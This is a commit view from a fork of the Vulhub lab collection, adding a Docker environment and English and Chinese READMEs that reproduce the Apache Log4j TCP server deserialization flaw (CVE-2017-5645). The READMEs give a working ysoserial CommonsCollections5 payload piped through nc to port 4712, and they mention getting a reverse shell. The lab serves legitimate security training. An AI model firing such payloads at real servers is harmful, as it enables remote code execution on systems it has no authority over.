aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
log4j/CVE-2017-5645/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.6 KiB

BIN
log4j/CVE-2017-5645/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 15 KiB

38
log4j/CVE-2017-5645/README.md Normal file
View File

@@ -0,0 +1,38 @@
# Apache Log4j TCP Server Deserialization Remote Code Execution (CVE-2017-5645)
[中文版本(Chinese version)](README.zh-cn.md)
Apache Log4j is a logging library for Java that supports starting remote logging servers. A security vulnerability exists in versions 2.x before 2.8.2 of Apache Log4j TCP Server. Attackers can exploit this vulnerability to execute arbitrary code.
References:
- https://issues.apache.org/jira/browse/LOG4J2-1863
- https://github.com/pimps/CVE-2017-5645
## Environment Setup
Execute the following command to start a Log4j 2.8.1 TCP server:
```
docker compose up -d
```
After the environment starts, a TCP server will be opened on port 4712.
Note: Besides using Vulhub's docker image to set up the environment, we can directly start this TCP server from the command line after downloading the log4j jar files: `java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`, without needing to use Vulhub or write code.
## Vulnerability Reproduction
We use ysoserial to generate a payload, then send it directly to the `your-ip:4712` port.
```
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
```
Then execute `docker compose exec log4j bash` to enter the container, and you can see that /tmp/success has been successfully created:
![](1.png)
Execute a [reverse shell command](http://www.jackson-t.ca/runtime-exec-payloads.html) to successfully get a shell:
![](2.png)

36
log4j/CVE-2017-5645/README.zh-cn.md Normal file
View File

@@ -0,0 +1,36 @@
# Apache Log4j TCP Server 反序列化命令执行漏洞CVE-2017-5645
Apache Log4j是一个用于Java的日志记录库其支持启动远程日志服务器。Apache Log4j TCP Server 2.8.2之前的2.x版本中存在反序列化漏洞攻击者可利用该漏洞执行任意代码。
参考链接:
- https://issues.apache.org/jira/browse/LOG4J2-1863
- https://github.com/pimps/CVE-2017-5645
## 漏洞环境
执行如下命令启动漏洞环境:
```
docker compose up -d
```
环境启动后将在4712端口开启一个TCPServer。
说一下除了使用vulhub的docker镜像搭建环境外我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer`java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`无需使用vulhub和编写代码。
## 漏洞复现
我们使用ysoserial生成payload然后直接发送给`your-ip:4712`端口即可。
```
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
```
然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:
![](1.png)
执行[反弹shell的命令](http://www.jackson-t.ca/runtime-exec-payloads.html)成功弹回shell
![](2.png)

5
log4j/CVE-2017-5645/docker-compose.yml Normal file
View File

@@ -0,0 +1,5 @@
services:
log4j:
image: vulhub/log4j:2.8.1
ports:
- "4712:4712"